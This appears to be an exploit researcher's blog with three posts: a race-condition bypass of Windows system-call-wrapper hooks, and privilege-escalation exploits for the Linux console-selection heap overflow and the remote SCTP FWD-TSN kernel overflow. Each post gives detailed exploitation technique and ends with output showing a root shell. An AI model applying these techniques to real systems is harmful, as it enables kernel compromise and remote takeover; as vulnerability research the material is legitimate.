kernelbof

Sunday, May 16, 2010

Security is Burning - Everything Old is New Again

Every time I convince myself not to make any more public posts, something almost magically occurs to make me change my mind.
The day before yesterday was a particularly boring day, when out of the blue a friend of mine dropped me an email bearing a link along with the following tongue-in-cheek remark:

"Looks familiar, doesn't it? :)))))"

What he linked me to was this URL.

It seems the latest trend in security research right now involves people forging new "names" for ~decade-old security issues. In this particular case, the attack referred to by the Matousec link was generously rechristened an "argument-switch attack". Are we that short on things to talk about? Or maybe we're all just assumed to be amnesiacs by our peers? Who knows.

Just to cite just a few references (there are many more out there) to the
"Awful and Gruesome System Call Wrapper Flaw-By-Design" approach:

- 1) http://seclists.org/bugtraq/2003/Dec/351 - Andrey Kolishak

- 2) http://www.watson.org/~robert/2007woot/2007usenixwoot-exploitingconcurrency.pdf - Robert Watson

- 3) http://events.ccc.de/congress/2007/Fahrplan/events/2353.en.html - myself and twiz

What's funny is that when I re-read what I myself wrote in that presentation [3], I realized that I'd *also* "forged" a ridiculous new name, as well: "Handle Object Redirect Attacks" -- woot! Go me! It's so irresistible, forging useless new names!!

I don’t want to criticize the work of any other researchers, and I tend to think that the Matousec people did find these issues by themselves –- spending (wasting?) a lot of time attempting also to advise security firms about the presence of this issue on almost all of their products... But despite this fact, I can state with a good degree of certainty that almost all of the major AV firms HAVE KNOWN about it for years.

Anyone dealing with this sort of thing also knows why they didn't change/fix anything. Is it worth changing, when you consider comparing the effort of changing the products' core engines against the real risk ? I think not.

As a side-note... we never really thought that any of this was a critical issue, to begin with… after all, I'm pretty sure that by now most people in the security field are aware of the fact that running untrusted native code on a box practically translates to 'ring 0 access'...
but hey -- that's a whole other story entirely. :)

Moreover there is cause to have reasonable doubt about how deep such research has actually been. Citing from their article:

"The argument-switch attack requires specific behavior from system scheduler which is impossible to ensure from user mode."

Thinking “Good! Maybe they simply wrote an in-depth analysis only for their customers?” (citing from their article: “The full results of the research were offered to our clients and other software vendors”. Who knows?! :D )

Well, stating that the scheduler behavior cannot be controlled at all from userland is a little simplistic. As anybody who has dealt with kernel exploitation knows very well, there is no way the kernel can trust the user land. If the vulnerable kernel control path runs in process-context and it directly references a virtual userland address, you can always force it to perform a deterministic context-switch. This can be done indistinctly, and of course one-shot, on both Multi-processor and Uni-processor systems.

I've seen a lot of posts speculating against the fact that this vulnerability can be exploited using only a bruteforce approach and that this is reliable with a few tries only on SMP boxes.

That’s NOT true.

Using a bruteforce approach, sooner or later the check WILL certainly get bypassed, true…, but what do you do if the AV engine simply blocks the first attempt, showing a process-blocking pop-up or blacklisting the process? etc.. In my humble opinion, taking this approach accomplishes little more than making the vulnerability completely useless (ie, even more than it already was to begin with). The bypass MUST be one-shot-always.

I think it is now time to show the PoC I wrote during the presentation [3] but never released till now. It exploits the “Demand Paging” mechanism together with the “Direct I/O” and cache write-through to accomplish the one-shot bypass.

Modern OSs have supported these concepts for ages, and exploiting them to control the context switch is, in most of the cases, an easy task; Windows is no exception. The PoC demonstrates how to bypass one-shot the famous hookdemo.sys vulnerable driver (written by Andrey Kolishak in [1]) on Uni-Processor systems.

The driver simply wraps the ZwOpenKey() system call, trying to prevent access to the following key: “\HKEY_LOCAL_MACHINE\Software\hookdemo\test1”.
The driver uses two different methods to deny access to the given resource Registry key. The following PoC has been written to address the first (default) hook implementation which dereferences the userland object twice.

The PoC code is straightforward. It manages two different string names.

A monitored key: “\HKEY_LOCAL_MACHINE\Software\hookdemo\test1”
A fake key: “\HKEY_LOCAL_MACHINE\Software\hookfake\test1” .

The userland process issues a system call using the fake key while a racer thread modifies it after the thread issuing the system call gets switched away from the current CPU. Everything works one-shot in a deterministic way. Let’s see how:

The userland process first creates (CreateFile()) a non-existent random file name using the Direct I/O flags (which is FILE_FLAG_NO_BUFFERING on Windows) . Next, respecting the granularity alignment constrains, the code writes the last common part of the key (“test1”) into this file (WriteFile()) and closes the handle. Since the Cache Manager cannot rely on the system file cache during the next file-read, the kernel is forced to access the file on the disk, issuing an arbitrary reschedule. Using the FILE_FLAG_WRITE_THROUGH flag alone is not enough since the data will be suddenly written onto the disk but at the same time the system file cache gets filled with the actual data and will be reused later.

The next step concerns the creation of double memory mapping (CreateFileMapping() and MapViewOfFileEx()). The former is an anonymous mapping. The latter is placed right after the former map and maps the first section of the aforementioned file. Since Windows uses the Demand Paging mechanism, the system just creates an internal structure to keep track of the new mapping and returns. The file data corresponding to the actual mapping is not pushed into the cache and no page tables are even set up. Now that the two mappings are created, we can put the former part of the fake key (“\HKEY_LOCAL_MACHINE\Software\hookfake\”) into the last part of the first mapping. Doing so, the former part of the key string is already in memory and the latter contiguous part exists only within the disk and is not yet loaded into memory.

We can now manually build the system call parameters, putting the address of the key string into the UNICODE_STRING object referenced by the OBJECT_ATTRIBUTES structure.
We need to do one last thing: before invoking the system call, we need to set up the racer thread. This thread spins on a process global variable, waiting for its state change. When the state changes the racer thread substitutes the “hookfake” string with the “hookdemo” string, restoring the original key: “\HKEY_LOCAL_MACHINE\Software\hookdemo\test1”.

But when will this be done? Let’s take a look at the hookdemo.sys driver:

During the NewZeOpenKey() system call wrapper routine, the code accesses the user-supplied key string at this line:

[ ... ]
rc = RtlAppendUnicodeStringToString(&KeyName, ObjectAttributes->ObjectName);
[ ... ]

ObjectName is the UNICODE_STRING structure holding the reference to our key string. When the driver tries to copy the final part of the key string (the one placed on the second mapping: “test1”) into the local KeyName object, the system generates a page fault since no page tables have been set up yet.

Moreover, the Windows Cache Manager realizes that 1) there is no cache available 2) the file I/O and memory mapped file MUST NOT pass through the cache (since the file has been opened with the FILE_FLAG_NO_BUFFERING) and begins a disk data transfer putting the process to sleep, thus rescheduling!! At this point, the wrapper routine has already copied the former part of the key; when the thread is scheduled back, the routine simply continues to copy the remaining part (and everything happens totally transparently from the driver wrapper perspective).

Just after the context switch occurs, the racer thread modifies the original (already copied) string and exits. Finally the original system call, which will be called by the system call wrapper, will manage a different key string: the one we are interested in! Game Over!

Just a side note: to succeed we need for the two threads to be serialized. The second thread must not run before the first thread is scheduled, but at the same time it has to run only AFTER the former thread invokes the system call. This is achieved by making the former thread set a global spinning variable which will be monitored by the racer thread. To be sure that the second thread will not modify the string before the first thread actually performs the system call we must assure that the two thread run always on the same processor! Ironically, this code natively performs correctly ONLY on Uni-processor boxes. If we are playing with multi-core/multi-processor systems we have to assure that all of the process’s threads run on a given CPU using the processor affinity API (e.g. SetProcessAffinityMask()) as shown in the PoC.

This is just a sample output:

TSC Analysis: Before SystemCall = 174341962662283 After SystemCall = 174341962672609
[Diff] => 10326
Called normally: Key Handle: 0xffffffff

TSC Analysis: Before SystemCall = 174341968174781 After SystemCall = 174342017146092
[Diff] => 48971311
Check Bypassed: Game Over! KeyHandle: 0x7bc

As we can see, the first try has been made calling the system call without special mapping, directly passing the original key string. The wrapper intercepts the call and denies access to the registry key. The second try has been made using the special mapping describe above and, as we can see, the system call returns a valid handle. Game Over.

The PoC code can be downloaded [here].
The hookdemo.sys code by Andrey Kolishak can be downloaded [here].

Thursday, July 2, 2009

Even when one byte matters

Common Vulnerabilities and Exposures

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1046

"The console selection feature in the Linux kernel 2.6.28 before 2.6.28.4, 2.6.25, and possibly earlier versions, when the UTF-8 console is used, allows physically proximate attackers to cause a denial of service (memory corruption) by selecting a small number of 3-byte UTF-8 characters, which triggers an "an off-by-two memory error. NOTE: it is not clear whether this issue crosses privilege boundaries."

Ubuntu Security Notice USN-751-1

http://www.ubuntu.com/usn/usn-751-1

"The virtual consoles did not correctly handle certain UTF-8 sequences. A local attacker on the physical console could exploit this to cause a system crash, leading to a denial of service."

RedHat Security Advisory

http://rhn.redhat.com/errata/RHSA-2009-0451.html

"An off-by-two error was found in the set_selection() function of the Linux kernel. This could allow a local, unprivileged user to cause a denial of service when making a selection of characters in a UTF-8 console. Note: physical console access is required to exploit this issue."

When I was looking at vendor advisories regarding SCTP remote issue i got attracted by another bug regarding hypothetical kernel heap overflow.
For the umpteenth time the impact of the vulnerability is : DoS only.
The impact of this issue is highly limited because of you need a VC attached to your process to exploit it, but it's worth spending some time on it since it's not an everyday bug to find in the kernel.. it's an interesting scenario: an off-by-one(two) kernel heap overflow.

As I did for the previous post, I'm not going to give any detailed
description of the exploit: it should be straightforward enough to
everyone who's used to play with internal kernel structures.
What I'm about to do is, once again, just briefly introduce the
vulnerability and then spend some time on showing how it is possible to
turn it in a nearly one-shot exploit.

Before going on i want to include a digression about this blog:
the original idea was to publish a month by month exploit regarding DoS-claiming-only vulnerability in the linux kernel.
After publishing the first post, about SCTP remote exploit, i received some roasts.
Someone pulled me down about disclosing a few cool stuff.
I want to point out that i just wrote the exploit: i did not kill the vulnerability.
I don't like full disclosure, at least i don't like what full disclosure has become today: a freaking race between killer-vulns-guys.
Even if i think there's a big difference between killing vulnerabilities and writing good exploit code i 'm not sure if i'll continue publishing these stuffs.

The buffer is allocated here:
file: /drivers/char/selection.c
func: set_selection()

multiplier = use_unicode ? 3 : 1;
bp = kmalloc((sel_end-sel_start)/2*multiplier+1, GFP_KERNEL);

then the function copies the buffer:

sel_buffer = bp;
obp = bp;
for (i = sel_start; i <= sel_end; i += 2) {

c = sel_pos(i);

if (use_unicode)

bp += store_utf8(c, bp);

...

The loop goes from sel_start to sel_end (inclusive). The last character is not multiplied by multiplier (which has value 3) and so we can overflow the buffer by 1 or 2 byte. To make the overflow meaningful we have to allocate a buffer close to the size of a cache object slab or the overflow will end up in the pad zone. Since we can control the "delta" between sel_start and sel_end we can arbitrary choose the slub to be used.

On of the better slub to pick usually is the 96 bytes slub.. but it doesn't fulfill our goal because:

63 / 2 * 3 + 1 = 94

(if we overflow 2 byte we get 96.. no meaningful overflow happens..)

64 / 2 * 3 + 1= 97

(too large to fit in..)

We pick instead the 128 slub cache.. using a gap equal to:

84 / 2 * 3 = 127

(if we overflow 2 bytes we have meaningful off-by-one heap overflow)

Now we can overflow into another 128 byte object which has some interesting meaningful pointer or we can smash internal SLUB structure.

The exploit takes the latter approach smashing internal SLUB structure taking full control of the SLUB allocation engine.
I decide to use again a previously disclosed structure as a placeholder: SCTP ssnmap struct.

This can lead to some problem with SELinux.
There are other interesting structures to pick in the place of SCTP ones but it is not worth showing them here for such an not useful exploit.

A couple of words about lack of full-recovery in the exploit. On boxes protected by zero mapping kernel protection the code leaves two descriptors holding smashed pointers in its internal structures. Before executing the shell the code migrates those descriptors inside a child process. When this child process will be killed (after reboot?) the kernel oops.

A different way could be:
- migrate descriptors inside some daemon using ptrace()/SCM_RIGHT
- directly patch smashed pointers adding code to the ring0 shellcode
- using a stupid lkm

The exploit works only on x86-64 platform with SLUB allocator but anyone can run it on x86 kernel modifying a couple of lines.

Talking about "external resources", the exploit uses "/proc/slabinfo" and "/proc/kallsyms". The former is not crucial but increases the exploitation odds close to 100% on idle boxes. The latter is not needed if you have access to the kernel image.

I'd like to thank twiz for his pioneer work on original old SLAB exploitation approach: it helps me much in abusing new SLUB counterpart.

Tested on target:
Ubuntu 8.04 x86_64 (generic/server)
Ubuntu 8.10 x86_64 (generic/server)
Fedora Core 10 x86_64 (default installed kernel - without SElinux)

$ ./tioctl_houdini
[**] Patching ring0 shellcode with userspace addr: 0x4017e0
[**] Using port: 25433
[**] Getting slab info...
[**] Mapping Segments...
[**] Trying mapping safe page...Page Protection Present (Unable to Map Safe Page)
[**] Mapping High Address Page (don't kill placeholder child)
[**] Mapping Code Page... Done
[**] Binding on CPU 0
[**] Start Server Thread..

...
...
...
┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼
┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼
┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼
[**] Umapped end-to-end fd: 212
[**] Unsafe fd: ( 210 224 214 212 )
[**] Hijacking fops...
[**] Migrate evil unsafe fds to child process..
[**] Child process 25463 _MUST_ NOT die..keep it alive:)
[**] Got root!
# id
uid=0(root) gid=0(root) groups=1001(anon)

GAME OVER

The exploit code can be downloaded here.

Monday, April 27, 2009

When a "potential D.o.S." means a one-shot remote kernel exploit: the SCTP story

Common Vulnerabilities and Exposures
http://cve.mitre.org/cgi-bi/cvename.cgi?name=CVE-2009-0065

"Buffer overflow in net/sctp/sm_statefuns.c in the Stream Control Transmission Protocol (sctp) implementation in the Linux kernel before 2.6.28-git8 allows remote attackers to have an unknown impact via an FWD-TSN (aka FORWARD-TSN) chunk with a large stream ID. "

Ubuntu Security Notice USN-751-1
http://www.ubuntu.com/usn/usn-751-1

"The SCTP stack did not correctly validate FORWARD-TSN packets. A remote attacker could send specially crafted SCTP traffic causing a system crash, leading to a denial of service. (CVE-2009-0065)"

RedHat Security Advisory
http://rhn.redhat.com/errata/RHSA-2009-0331.html

"a buffer overflow was found in the Linux kernel Partial Reliable Stream
Control Transmission Protocol (PR-SCTP) implementation.
This could, potentially, lead to a denial of service if a Forward-TSN chunk is received
with a large stream ID. (CVE-2009-0065, Important) "

Potentially a DoS? Unknown Impact? Really? :D

I'm wondering why kernel developers (or vendors?) continue to claim that kernel memory corruption are just Denial of Service. Most of the times they _are_ exploitable.. yes, even when the vulnerability is remotely triggered, yes.. even when the corruption takes place in a freaking slub in the middle of a kernel _heap_ .. yes even when you have kernel data pages marked NX and the kernel .text read-only and yes, absolutely yes even when you start only with a 16bit displacement...

Last month one of my customer (that has a _custom_ deployed sctp application on his network ) asked me if the vulnerability may have some impact on his systems. The answer? "Yes it does", and since someone thinks that is not exploitable and someone else speculates over a possible locally privilege escalation only (with remote host sending TSN packet) i decided to write a completely remote exploit.

It is extremely reliable (nearly one-shot always), given that you know the target kernel. I tested it on Ubuntu 8.04 and Ubuntu 8.10
server boxes running with different kernels (ubuntu kernel for amd64) and on OpenSuse11.1 and a Fedora Core 10 (yes, extra-brownie points here, it works great on Selinux too). ...

I dont want to talk about the exploit, because the code should be self explanatory, but i'd like to briefly explore the vulnerability:

From an exploit writer point of view, the most critical points are: where the memory corruption occurs, when it occurs and what type of data structures are involved. The code that triggers the overflow is on sctp_ssn_skip() in the file: /net/sctp/structs.h:

void sctp_ssn_skip(struct sctp_stream *stream, __u16 id, __u16 ssn)
{
stream->ssn[id] = ssn+1;
}

Parameter "id" is not checked and later used as an index referenced by stream->ssn pointer: a 16bit value.
We can only overwrite memory _close_ the the struct involved.

Let's take a look at the sctp_stream structure and its stream pointer..
sctp_ssnmap_new() and sctp_ssnmap_init() function are in /net/sctp/ssnmap.c

Structures involved in streams mapping are:

struct sctp_stream {
__u16 *ssn;
unsigned int len;
};

struct sctp_ssnmap {
struct sctp_stream in;
struct sctp_stream out;
int malloced;
};

The code that allocates them is the following:

#define MAX_KMALLOC_SIZE 131072 //0x20000
...
size = sctp_ssnmap_size(in, out);
if (size <= MAX_KMALLOC_SIZE) retval = kmalloc(size, gfp);

If the size is under the MAX_KMALLOC_SIZE threshold the function dynamically allocates the sctp_ssnmap struct using as a parameter the number of in and out streams.
That's good news! Manipulating sctp handshake options we can arbitrary (if the sctp application has no application-level checks on, f.e., the number of simultaneously opened SCTP streams) decide the slab that will be used to allocate the chunk.

Immediately after that, the function calls sctp_ssnmap_init() to initialize in/out stream pointers:

static struct sctp_ssnmap *sctp_ssnmap_init(struct sctp_ssnmap *map, __u16 in, __u16 out)
{
memset(map, 0x00, sctp_ssnmap_size(in, out));

/* Start 'in' stream just after the map header. */
map->in.ssn = (__u16 *)&map[1]; <--- stream in init
map->in.len = in;

/* Start 'out' stream just after 'in'. */
map->out.ssn = &map->in.ssn[in]; <--- stream out init
map->out.len = out;

return map;
}

Again, good news. The stream pointers are self-contained. They point inside the previously allocated buffer, and more precisely the input stream is located exactly after the header. No kfree() will ever be called on these pointers: in other words they are a safe place to overwrite, and there's no need to worry about post-exploitation recovery.

The last thing that may complicate a bit the exploit is a check that the kernel makes before invoking sctp_ssn_skip():

/net/sctp/ulpqueue.c: sctp_ulpk_skip() :

if (SSN_lt(ssn, sctp_ssn_peek(in, sid))) <--- check
return;

/* Mark that we are no longer expecting this SSN or lower. */
sctp_ssn_skip(in, sid, ssn);

with SSN_lt():

enum {
SSN_SIGN_BIT = (1<<15)>

Strictly speaking this code checks if the value we are overwriting (the old SSN content) is greater or equal to the new value: if so it doesn't process the FWD chunk. The comparison here is made using Serial Number Arithmetic (like the one used for protocol sequence number (eg. tcp seq number)) and can be fooled writing multiple chunks until it legally wraps around to a well known defined value.

Then, at this point, if we know the target running kernel, we can:

1) Control the slab/slub to be used
2) Overwrite a safe pointer close to the overflowing buffer
3) Easily control overwritten data..

.. in other words..
..
#./sctp_houdini -H 192.168.200.1 -P 5555 -h 192.168.200.10 -p 20000 -s 15000 -c 700 -t fedora64_10-2.6.25-117
[**] Monitoring Network for TSN/VTAG pairs..
[**] Start flushing slub cache...
[**] Using TSN/VTAG pairs: (TSN: 28022e8 <=> VTAG: 41fdd4fb) / (TSN: 8cafd3ae <=> VTAG: 1a99396c)...
[**] Overwriting neightboard sctp map..
[**] Disabling Selinux Enforcing Mode..
[**] Overwriting neightboard sctp map ......
[**] Overwriting vsyscall shadow map..
[**] Hijacking vsyscall shadow map..
[**] Waiting daemons executing gettimeofday().. this can take up to one minute...
[**] ....
[**] Connected!
[**] Restoring vsys: Emulate gettimeofday()...
uid=0(root) gid=0(root) groups=51(smmsp) context=system_u:system_r:sendmail_t:s0

GAME OVER

The exploit code can be downloaded here.